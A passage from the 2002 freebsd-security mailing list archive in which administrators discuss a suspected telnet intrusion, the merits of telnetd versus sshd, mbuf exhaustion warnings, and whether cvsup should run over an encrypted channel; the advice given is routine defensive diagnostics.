-0700 (PDT) (envelope-from owner-bugmaster@freebsd.org) Date: Mon, 6 May 2002 11:23:38 -0700 (PDT) Message-Id: <200205061823.g46INcU98140@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: peter set sender to owner-bugmaster@freebsd.org using -f From: FreeBSD bugmaster To: security@FreeBSD.org Subject: Current problem reports assigned to you Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Current FreeBSD problem reports No matches to your query To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 12: 2: 0 2002 Delivered-To: freebsd-security@freebsd.org Received: from fed1mtao04.cox.net (fed1mtao04.cox.net [68.6.19.241]) by hub.freebsd.org (Postfix) with ESMTP id A4E3D37B401 for ; Mon, 6 May 2002 12:01:54 -0700 (PDT) Received: from ocnetworking.com ([68.4.231.87]) by fed1mtao04.cox.net (InterMail vM.5.01.04.05 201-253-122-122-105-20011231) with ESMTP id <20020506190155.BGTK26656.fed1mtao04.cox.net@ocnetworking.com> for ; Mon, 6 May 2002 15:01:55 -0400 Message-ID: <3CD6D3A2.1CC77A9B@ocnetworking.com> Date: Mon, 06 May 2002 12:04:02 -0700 From: "Dylan A. Reinhold" Organization: InterNetworking http://www.ocnetworking.com X-Mailer: Mozilla 4.79 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: security@freebsd.org Subject: Telent Exploit Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I think I just got hit with a telent exploit. I noticed some network activity on my cable modem, Logged in my gateway ran 'w' no one else but ran 'top' I had telned running, in my security logs I found this: May 5 16:27:45 cx17105-b /kernel: ipfw: 4000 Accept TCP 211.234.111.226:58981 68**.**.**:23 in via ep0 May 5 16:27:46 cx17105-b /kernel: ipfw: 4000 Accept TCP 211.234.111.226:59085 68.**.**.**:23 in via ep0 May 5 16:27:47 cx17105-b /kernel: ipfw: 4000 Accept TCP 211.234.111.226:59086 **.**.**:23 in via ep0 Im running stable what gives???? The worst part was I only had Telnet enabled for 3 hours.... $uname -a FreeBSD cx17105-b 4.5-STABLE FreeBSD 4.5-STABLE #2: Mon Apr 8 20:07:25 PDT 2002 root@cx17105-b:/usr/obj/usr/src/sys/SPUD i386 Thanks, Dylan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 12:38:24 2002 Delivered-To: freebsd-security@freebsd.org Received: from ziplip.com (mail.ziplip.com [128.242.109.119]) by hub.freebsd.org (Postfix) with ESMTP id A349937B404 for ; Mon, 6 May 2002 12:38:15 -0700 (PDT) Received: from 10.1.0.21 (EHLO 10.1.0.21 10.1.0.21 [10.1.0.21] (may be forged)) by 10.1.0.21 with ESMTP id <135YGUD5H2YCVJ3JLY3L2CMBQCXYNOQCEADYX2T5@ziplip.com> for ; 06 May 2002 12:37:22 -0700 (PDT) Message-ID: <135YGUD5H2YCVJ3JLY3L2CMBQCXYNOQCEADYX2T5@ziplip.com> Date: Mon, 6 May 2002 12:37:22 -0700 (PDT) From: SolarfluX Reply-To: solarflux@ziplip.com To: security@freebsd.org Subject: Re: Telnet Exploit Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-ZLPwdHint: X-ZLExpiry: -1 X-ZLReceiptConfirm: N X-ZLAuthType: WEB-MAIL X-ZLAuthOn: Y X-Mailer: ZipLip Sonoma v3.2 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Why in the world are you using telnetd anyhow? You should be using SSHD and never telnetd. Telnetd should be 'forbidden'... Did you log in from the internet to your gateway via telnet during that three hour period? Did you run tcpdump or ssldump (http://www.rtfm.com/ssldump/) to see where the traffic is coming from? Don't jump to conclusions before you acquire some data... -S > -----Original Message----- > From: Dylan A. Reinhold [mailto:Dylan@ocnetworking.com] > Sent: Monday, May 06, 2002, 12:04 PM > To: security@freebsd.org > Subject: Telent Exploit > > I think I just got hit with a telent exploit. I noticed some network > activity on my cable modem, Logged in my gateway ran 'w' no one else but > > ran 'top' I had telned running, in my security logs I found this: > > May 5 16:27:45 cx17105-b /kernel: ipfw: 4000 Accept TCP > 211.234.111.226:58981 68**.**.**:23 in via ep0 > May 5 16:27:46 cx17105-b /kernel: ipfw: 4000 Accept TCP > 211.234.111.226:59085 68.**.**.**:23 in via ep0 > May 5 16:27:47 cx17105-b /kernel: ipfw: 4000 Accept TCP > 211.234.111.226:59086 **.**.**:23 in via ep0 > > Im running stable what gives???? The worst part was I only had Telnet > enabled for 3 hours.... > > $uname -a > FreeBSD cx17105-b 4.5-STABLE FreeBSD 4.5-STABLE #2: Mon Apr 8 20:07:25 > PDT 2002 root@cx17105-b:/usr/obj/usr/src/sys/SPUD i386 > > Thanks, > Dylan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 12:46: 8 2002 Delivered-To: freebsd-security@freebsd.org Received: from patrocles.silby.com (d15.as28.nwbl0.wi.voyager.net [169.207.69.15]) by hub.freebsd.org (Postfix) with ESMTP id 438C937B403 for ; Mon, 6 May 2002 12:46:00 -0700 (PDT) Received: from patrocles.silby.com (localhost [127.0.0.1]) by patrocles.silby.com (8.12.3/8.12.3) with ESMTP id g46JksUm061500; Mon, 6 May 2002 14:46:54 -0500 (CDT) (envelope-from silby@silby.com) Received: from localhost (silby@localhost) by patrocles.silby.com (8.12.3/8.12.3/Submit) with ESMTP id g46JkcMc061497; Mon, 6 May 2002 14:46:54 -0500 (CDT) X-Authentication-Warning: patrocles.silby.com: silby owned process doing -bs Date: Mon, 6 May 2002 14:46:38 -0500 (CDT) From: Mike Silbersack To: admin Cc: freebsd-security@freebsd.org Subject: Re: 4.5 stable & tcpip fix maybe? In-Reply-To: Message-ID: <20020506144517.X60840-100000@patrocles.silby.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, 6 May 2002, admin wrote: > Did any of the last src upgrades make a change that might cause me to get > this error... > > May 5 13:52:05 xXx /kernel: m_retry failed, consider increase mbuf value > May 5 13:52:05 xXx /kernel: m_retryhdr failed, consider increase mbuf > value There's probably no DoS going on here, you're just running out of mbufs clusters; run netstat -m to determine whether this is the case, then read tuning(7) to determine how to increase the number of mbufs allocated. Mike "Silby" Silbersack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 12:52:16 2002 Delivered-To: freebsd-security@freebsd.org Received: from balistraria.nexusxi.com (balistraria.nexusxi.com [216.123.202.196]) by hub.freebsd.org (Postfix) with SMTP id 3715A37B407 for ; Mon, 6 May 2002 12:52:02 -0700 (PDT) Received: (qmail 17300 invoked from network); 6 May 2002 19:51:56 -0000 Received: from unknown (HELO h410g3n.localnet) (204.209.140.10) by 0 with SMTP; 6 May 2002 19:51:56 -0000 Content-Type: text/plain; charset="iso-8859-1" From: "Dalin S. Owen" Reply-To: dowen@pstis.com Organization: Nexus XI Corp. To: security@freebsd.org Subject: Re: Telnet Exploit Date: Mon, 6 May 2002 13:47:54 -0600 X-Mailer: KMail [version 1.4] References: <135YGUD5H2YCVJ3JLY3L2CMBQCXYNOQCEADYX2T5@ziplip.com> In-Reply-To: <135YGUD5H2YCVJ3JLY3L2CMBQCXYNOQCEADYX2T5@ziplip.com> MIME-Version: 1.0 Content-Transfer-Encoding: quoted-printable Message-Id: <200205061347.54915.dowen@pstis.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On May 6, 2002 01:37 pm, SolarfluX wrote: > Why in the world are you using telnetd anyhow? You should be using SSH= D > and never telnetd. Telnetd should be 'forbidden'... So if we are going to do away with telnetd, we should scrap FTP and SMTP=20 then.. as they are garbage protocols. We can not have that attitude. Why do you think FreeBSD still ships with= =20 rlogin? To maintain backward compatibility with older systems. > > I think I just got hit with a telent exploit. I noticed some network > > activity on my cable modem, Logged in my gateway ran 'w' no one else = but > > > > ran 'top' I had telned running, in my security logs I found this: > > > > May 5 16:27:45 cx17105-b /kernel: ipfw: 4000 Accept TCP > > 211.234.111.226:58981 68**.**.**:23 in via ep0 > > May 5 16:27:46 cx17105-b /kernel: ipfw: 4000 Accept TCP > > 211.234.111.226:59085 68.**.**.**:23 in via ep0 > > May 5 16:27:47 cx17105-b /kernel: ipfw: 4000 Accept TCP > > 211.234.111.226:59086 **.**.**:23 in via ep0 > > > > Im running stable what gives???? The worst part was I only had Telnet > > enabled for 3 hours.... > > > > $uname -a > > FreeBSD cx17105-b 4.5-STABLE FreeBSD 4.5-STABLE #2: Mon Apr 8 20:07:= 25 > > PDT 2002 root@cx17105-b:/usr/obj/usr/src/sys/SPUD i386 > > > > Thanks, > > Dylan > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message If you running 4.5-STABLE, you shouln't have anything to worry about... = those=20 logs look like the result of a "ipfw log allow tcp from any to any 23 set= up"=20 or similer command. You are probably fine. But if you are truely paranoid: Try running "sockstat" see if there is=20 anything bound to a socket that you did not put there. Check your firew= all=20 (if you have one). Did you have any sort of filesystem integrity toolkit=20 installed like tripwire or aide? Try running that.. look in /tmp for roo= tkit=20 remains.. we need more information then messages/dmesg/etc. Cya, Dalin Owen To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 13:19: 5 2002 Delivered-To: freebsd-security@freebsd.org Received: from laptop.tenebras.com (laptop.tenebras.com [66.92.188.18]) by hub.freebsd.org (Postfix) with SMTP id 3BE6E37B405 for ; Mon, 6 May 2002 13:19:03 -0700 (PDT) Received: (qmail 35735 invoked from network); 6 May 2002 20:18:58 -0000 Received: from sapphire.tenebras.com (HELO tenebras.com) (66.92.188.241) by 0 with SMTP; 6 May 2002 20:18:58 -0000 Message-ID: <3CD6E531.9080108@tenebras.com> Date: Mon, 06 May 2002 13:18:57 -0700 From: Michael Sierchio Reply-To: kudzu@tenebras.com User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.0rc1) Gecko/20020427 X-Accept-Language: en-us, en MIME-Version: 1.0 To: kudzu@tenebras.com Cc: Matthew Dillon , Nils Holland , Colin Faber , security@FreeBSD.ORG Subject: Re: You've Been Removed! References: <200205051832.OAA29652@matterhorn.pinn.net> <3CD59C0A.306681E3@fpsn.net> <20020505233756.A8532@daemon.tisys.org> <200205060013.g460DYn54044@apollo.backplane.com> <3CD6A85A.4050009@tenebras.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Correction -- where I said 'qsecretary' I meant tmda, which is generally available. That it is written in Python makes me a little ill -- rage away ;-) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 13:25:32 2002 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-43.dsl.lsan03.pacbell.net [63.207.60.43]) by hub.freebsd.org (Postfix) with ESMTP id 98D6937B40D for ; Mon, 6 May 2002 13:25:03 -0700 (PDT) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 4388966DE0; Mon, 6 May 2002 13:25:03 -0700 (PDT) Date: Mon, 6 May 2002 13:25:03 -0700 From: Kris Kennaway To: "Dylan A. Reinhold" Cc: security@freebsd.org Subject: Re: Telent Exploit Message-ID: <20020506132502.D59402@xor.obsecurity.org> References: <3CD6D3A2.1CC77A9B@ocnetworking.com> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="OROCMA9jn6tkzFBc" Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <3CD6D3A2.1CC77A9B@ocnetworking.com>; from Dylan@ocnetworking.com on Mon, May 06, 2002 at 12:04:02PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --OROCMA9jn6tkzFBc Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Mon, May 06, 2002 at 12:04:02PM -0700, Dylan A. Reinhold wrote: > I think I just got hit with a telent exploit. I noticed some network > activity on my cable modem, Logged in my gateway ran 'w' no one else but >=20 > ran 'top' I had telned running, in my security logs I found this: >=20 > May 5 16:27:45 cx17105-b /kernel: ipfw: 4000 Accept TCP > 211.234.111.226:58981 68**.**.**:23 in via ep0 > May 5 16:27:46 cx17105-b /kernel: ipfw: 4000 Accept TCP > 211.234.111.226:59085 68.**.**.**:23 in via ep0 > May 5 16:27:47 cx17105-b /kernel: ipfw: 4000 Accept TCP > 211.234.111.226:59086 **.**.**:23 in via ep0 >=20 > Im running stable what gives???? The worst part was I only had Telnet > enabled for 3 hours.... Why do you think you were exploited? The above only shows people connecting to the port. If you don't want people doing that, don't allow them to. Kris --OROCMA9jn6tkzFBc Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE81uaeWry0BWjoQKURAtEhAKC9omgwwxMd0cPhoWdXrBmIIK3QQQCfUVMx ecOfjLTI1BuR+S/OKExOZvw= =Z7jP -----END PGP SIGNATURE----- --OROCMA9jn6tkzFBc-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 13:25:43 2002 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [216.240.41.2]) by hub.freebsd.org (Postfix) with ESMTP id DC7BD37B405 for ; Mon, 6 May 2002 13:25:29 -0700 (PDT) Received: (from dillon@localhost) by apollo.backplane.com (8.11.6/8.9.1) id g46KPTU60903; Mon, 6 May 2002 13:25:29 -0700 (PDT) (envelope-from dillon) Date: Mon, 6 May 2002 13:25:29 -0700 (PDT) From: Matthew Dillon Message-Id: <200205062025.g46KPTU60903@apollo.backplane.com> To: Michael Sierchio Cc: kudzu@tenebras.com, Nils Holland , Colin Faber , security@FreeBSD.ORG Subject: Re: You've Been Removed! References: <200205051832.OAA29652@matterhorn.pinn.net> <3CD59C0A.306681E3@fpsn.net> <20020505233756.A8532@daemon.tisys.org> <200205060013.g460DYn54044@apollo.backplane.com> <3CD6A85A.4050009@tenebras.com> <3CD6E531.9080108@tenebras.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org : : :Correction -- where I said 'qsecretary' I meant tmda, which is :generally available. That it is written in Python makes me a :little ill -- rage away ;-) Heh. These are all good comments, people! -Matt Matthew Dillon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 13:32:26 2002 Delivered-To: freebsd-security@freebsd.org Received: from leaf.lumiere.net (leaf.lumiere.net [208.44.192.100]) by hub.freebsd.org (Postfix) with ESMTP id 002FA37B40C for ; Mon, 6 May 2002 13:32:00 -0700 (PDT) Received: by leaf.lumiere.net (Postfix, from userid 1082) id 09626CD25; Sun, 5 May 2002 02:10:17 -0700 (PDT) Date: Sun, 5 May 2002 02:10:16 -0700 From: Derrick John Klise To: "William J. Borskey" Cc: security@freebsd.org Subject: Re: ipfw Message-ID: <20020505021016.A84006@leaf.lumiere.net> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from wborskey@hotmail.com on Sat, May 04, 2002 at 08:36:52PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sat, May 04, 2002 at 08:36:52PM -0700, William J. Borskey wrote: > > is it possible to write rules for ipfw using ethernet addresses instead of > ip addresses? > I haven't used it, and I'm not sure it's stable, but: http://www.bsdshell.net/hut_ethfw.html is a possibility if you want to do ethernet-based filtering. -- Derrick John Klise "I went into a general store, and they wouldn't sell me anything specific". -- Steven Wright To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 14: 2:28 2002 Delivered-To: freebsd-security@freebsd.org Received: from koibito.iisc.com (koibito.iisc.com [198.5.5.5]) by hub.freebsd.org (Postfix) with ESMTP id 5240937B430 for ; Mon, 6 May 2002 14:02:22 -0700 (PDT) Received: from koibito.iisc.com ([127.0.0.1]) by koibito.iisc.com (8.9.0/8.9.0) with ESMTP id RAA22182 for ; Mon, 6 May 2002 17:02:21 -0400 (EDT) Message-Id: <200205062102.RAA22182@koibito.iisc.com> To: security@FreeBSD.ORG Subject: Re: Telnet Exploit In-Reply-To: Your message of "Mon, 06 May 2002 13:25:03 PDT." <20020506132502.D59402@xor.obsecurity.org> Date: Mon, 06 May 2002 17:02:20 -0400 From: "Charles M. Richmond" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > > May 5 16:27:45 cx17105-b /kernel: ipfw: 4000 Accept TCP > > 211.234.111.226:58981 68**.**.**:23 in via ep0 > > May 5 16:27:46 cx17105-b /kernel: ipfw: 4000 Accept TCP > > 211.234.111.226:59085 68.**.**.**:23 in via ep0 > > May 5 16:27:47 cx17105-b /kernel: ipfw: 4000 Accept TCP > > 211.234.111.226:59086 **.**.**:23 in via ep0 > > > > Im running stable what gives???? The worst part was I only had Telnet > > enabled for 3 hours.... > Why do you think you were exploited? The above only shows people > connecting to the port. If you don't want people doing that, don't > allow them to. Maybe he was and maybe he wasn't exploited, but 211.234.xxx.xxx is a block of addresses in Korea that are used by so many spammers that we block out the entire range. It is likely that someone was looking for a machine to hijack for spam generation. Charles *********************************************************************** * Charles Richmond Integrated International Systems Corporation * * cmr@iisc.com cmr@acm.org cmr@shore.net http://www.iisc.com * * UNIX Internals, I18N, L10N, X, Realtime Imaging, and Custom S/W * * 131 Bishop's Forest Drive , Waltham , Ma. USA 02452 * * (781) 647 2269 FAX (781) 647 3665 Cellular (781) 389 9777 * *********************************************************************** To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 14: 3:39 2002 Delivered-To: freebsd-security@freebsd.org Received: from borja.sarenet.es (borja.sarenet.es [192.148.167.77]) by hub.freebsd.org (Postfix) with ESMTP id 7CF0A37B430 for ; Mon, 6 May 2002 14:03:12 -0700 (PDT) Received: from there (localhost [127.0.0.1]) by borja.sarenet.es (8.12.3/8.12.3) with SMTP id g46L39R3024026; Mon, 6 May 2002 23:03:10 +0200 (CEST) (envelope-from borjamar@sarenet.es) Message-Id: <200205062103.g46L39R3024026@borja.sarenet.es> Content-Type: text/plain; charset="iso-8859-1" From: Borja Marcos To: solarflux@ziplip.com Subject: Re: Telnet Exploit Date: Mon, 6 May 2002 23:03:09 +0200 X-Mailer: KMail [version 1.3.2] References: <135YGUD5H2YCVJ3JLY3L2CMBQCXYNOQCEADYX2T5@ziplip.com> In-Reply-To: <135YGUD5H2YCVJ3JLY3L2CMBQCXYNOQCEADYX2T5@ziplip.com> Cc: security@freebsd.org MIME-Version: 1.0 Content-Transfer-Encoding: quoted-printable Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Monday 06 May 2002 21:37, you wrote: > Why in the world are you using telnetd anyhow? You should be using SSH= D > and never telnetd. Telnetd should be 'forbidden'... =09Why? Do you think ssh is more secure? It may not be. Just think about = the=20 complexity of ssh. It has been hit by a bug in zlib, for example. Or has = zlib=20 had an audit as strict as ssh? =09Telnet has its problems, but we should not say that ssh is "more secur= e"=20 acritically. It is obvious that it has advantages, however. =09Borja. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 14: 6:47 2002 Delivered-To: freebsd-security@freebsd.org Received: from ziplip.com (mail.ziplip.com [128.242.109.119]) by hub.freebsd.org (Postfix) with ESMTP id 9255837B401 for ; Mon, 6 May 2002 14:06:41 -0700 (PDT) Received: from 10.1.0.20 (EHLO 10.1.0.20 10.1.0.20 [10.1.0.20] (may be forged)) by 10.1.0.20 with ESMTP id for ; 06 May 2002 14:05:48 -0700 (PDT) Message-ID: Date: Mon, 6 May 2002 14:05:48 -0700 (PDT) From: SolarfluX Reply-To: solarflux@ziplip.com To: security@freebsd.org Subject: cvsup/install over ssh? Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-ZLPwdHint: X-ZLExpiry: -1 X-ZLReceiptConfirm: N X-ZLAuthType: WEB-MAIL X-ZLAuthOn: Y X-Mailer: ZipLip Sonoma v3.2 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Why doesn't cvsup have the option to be encrypted via ssh like anoncvs does? How about an option to install over an encrypted connection? Would anyone consider implementing either of these suggestions? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 14:16: 6 2002 Delivered-To: freebsd-security@freebsd.org Received: from crimelords.org (crimelords.org [199.233.213.8]) by hub.freebsd.org (Postfix) with ESMTP id 583D237B408 for ; Mon, 6 May 2002 14:15:58 -0700 (PDT) Received: from localhost (admin@localhost) by crimelords.org (8.11.6/8.11.6) with ESMTP id g46LC3m94688; Mon, 6 May 2002 16:12:07 -0500 (CDT) (envelope-from admin@crimelords.org) Date: Mon, 6 May 2002 16:12:03 -0500 (CDT) From: admin To: Mike Silbersack Cc: freebsd-security@freebsd.org Subject: Re: 4.5 stable & tcpip fix maybe? In-Reply-To: <20020506144517.X60840-100000@patrocles.silby.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org thanks, I do know about changing the mbuf, but finding out what was going on was of more interest...didn't think about -m, unfortunatly - this only happens when I'm NOT around..so a bit hard to catch it actually happening. On Mon, 6 May 2002, Mike Silbersack wrote: > > On Mon, 6 May 2002, admin wrote: > > > Did any of the last src upgrades make a change that might cause me to get > > this error... > > > > May 5 13:52:05 xXx /kernel: m_retry failed, consider increase mbuf value > > May 5 13:52:05 xXx /kernel: m_retryhdr failed, consider increase mbuf > > value > > There's probably no DoS going on here, you're just running out of mbufs > clusters; run netstat -m to determine whether this is the case, then read > tuning(7) to determine how to increase the number of mbufs allocated. > > Mike "Silby" Silbersack > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 14:16:44 2002 Delivered-To: freebsd-security@freebsd.org Received: from energyhq.homeip.net (213-97-200-73.uc.nombres.ttd.es [213.97.200.73]) by hub.freebsd.org (Postfix) with ESMTP id D486C37B403 for ; Mon, 6 May 2002 14:16:34 -0700 (PDT) Received: by energyhq.homeip.net (Postfix, from userid 1001) id 701123FCA8; Mon, 6 May 2002 23:16:34 +0200 (CEST) Date: Mon, 6 May 2002 23:16:34 +0200 From: Miguel Mendez To: SolarfluX Cc: security@freebsd.org Subject: Re: cvsup/install over ssh? Message-ID: <20020506231634.A33284@energyhq.homeip.net> Mail-Followup-To: SolarfluX , security@freebsd.org References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="SLDf9lqlvOQaIe6s" Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: ; from solarflux@ziplip.com on Mon, May 06, 2002 at 02:05:48PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --SLDf9lqlvOQaIe6s Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Mon, May 06, 2002 at 02:05:48PM -0700, SolarfluX wrote: Hi, > Why doesn't cvsup have the option to be encrypted via ssh like anoncvs do= es? IMHO nonsense, no sensitive data is exchanged between client and server. > How about an option to install over an encrypted connection? Let me be the first to say: "Where are your patches?" (TM) :) > Would anyone consider implementing either of these suggestions? Hmmkay, let me get this straight, you want to encrypt an anon ftp session? And the purpose would be? It's publicly available data you are transfering to your box, why in the world would you want to encrypt it? Cheers, --=20 Miguel Mendez - flynn@energyhq.homeip.net GPG Public Key :: http://energyhq.homeip.net/files/pubkey.txt EnergyHQ :: http://www.energyhq.tk FreeBSD - The power to serve! --SLDf9lqlvOQaIe6s Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE81vKynLctrNyFFPERApvTAJ4gOgRUGJBDgbu+mNAtkw40ToCy7QCdGXle 5qHQJ1pwblDVPX+ihKob2iY= =FxBR -----END PGP SIGNATURE----- --SLDf9lqlvOQaIe6s-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 14:19:33 2002 Delivered-To: freebsd-security@freebsd.org Received: from mrout2.yahoo.com (mrout2.yahoo.com [216.145.54.172]) by hub.freebsd.org (Postfix) with ESMTP id A132B37B404 for ; Mon, 6 May 2002 14:19:27 -0700 (PDT) Received: from zoot.corp.yahoo.com (zoot.corp.yahoo.com [216.145.52.89]) by mrout2.yahoo.com (8.11.6/8.11.6/y.out) with ESMTP id g46LJQE07906; Mon, 6 May 2002 14:19:26 -0700 (PDT) Received: from localhost (dougb@localhost) by zoot.corp.yahoo.com (8.12.3/8.12.3/Submit) with ESMTP id g46LJMjb013075; Mon, 6 May 2002 14:19:22 -0700 (PDT) Date: Mon, 6 May 2002 14:19:22 -0700 (PDT) From: Doug Barton To: Miguel Mendez Cc: SolarfluX , Subject: Re: cvsup/install over ssh? In-Reply-To: <20020506231634.A33284@energyhq.homeip.net> Message-ID: <20020506141901.W13051-100000@zoot.corp.yahoo.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, 6 May 2002, Miguel Mendez wrote: > On Mon, May 06, 2002 at 02:05:48PM -0700, SolarfluX wrote: > > Hi, > > > Why doesn't cvsup have the option to be encrypted via ssh like anoncvs does? > > IMHO nonsense, no sensitive data is exchanged between client and server. Maybe not in your world, but don't make the mistake of over-generalizing. :) -- "We have known freedom's price. We have shown freedom's power. And in this great conflict, ... we will see freedom's victory." - George W. Bush, President of the United States State of the Union, January 28, 2002 Do YOU Yahoo!? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 14:29:10 2002 Delivered-To: freebsd-security@freebsd.org Received: from cithaeron.argolis.org (bgm-24-169-166-7.stny.rr.com [24.169.166.7]) by hub.freebsd.org (Postfix) with ESMTP id CD3AF37B43A for ; Mon, 6 May 2002 14:27:27 -0700 (PDT) Received: from cithaeron.argolis.org (localhost [127.0.0.1]) by cithaeron.argolis.org (8.12.3/8.12.3) with ESMTP id g46LR3c7072314; Mon, 6 May 2002 17:27:03 -0400 (EDT) (envelope-from piechota@argolis.org) Received: from localhost (piechota@localhost) by cithaeron.argolis.org (8.12.3/8.12.3/Submit) with ESMTP id g46LR3kg072311; Mon, 6 May 2002 17:27:03 -0400 (EDT) X-Authentication-Warning: cithaeron.argolis.org: piechota owned process doing -bs Date: Mon, 6 May 2002 17:27:02 -0400 (EDT) From: Matt Piechota To: Miguel Mendez Cc: SolarfluX , Subject: Re: cvsup/install over ssh? In-Reply-To: <20020506231634.A33284@energyhq.homeip.net> Message-ID: <20020506172523.K71568-100000@cithaeron.argolis.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, 6 May 2002, Miguel Mendez wrote: > Hmmkay, let me get this 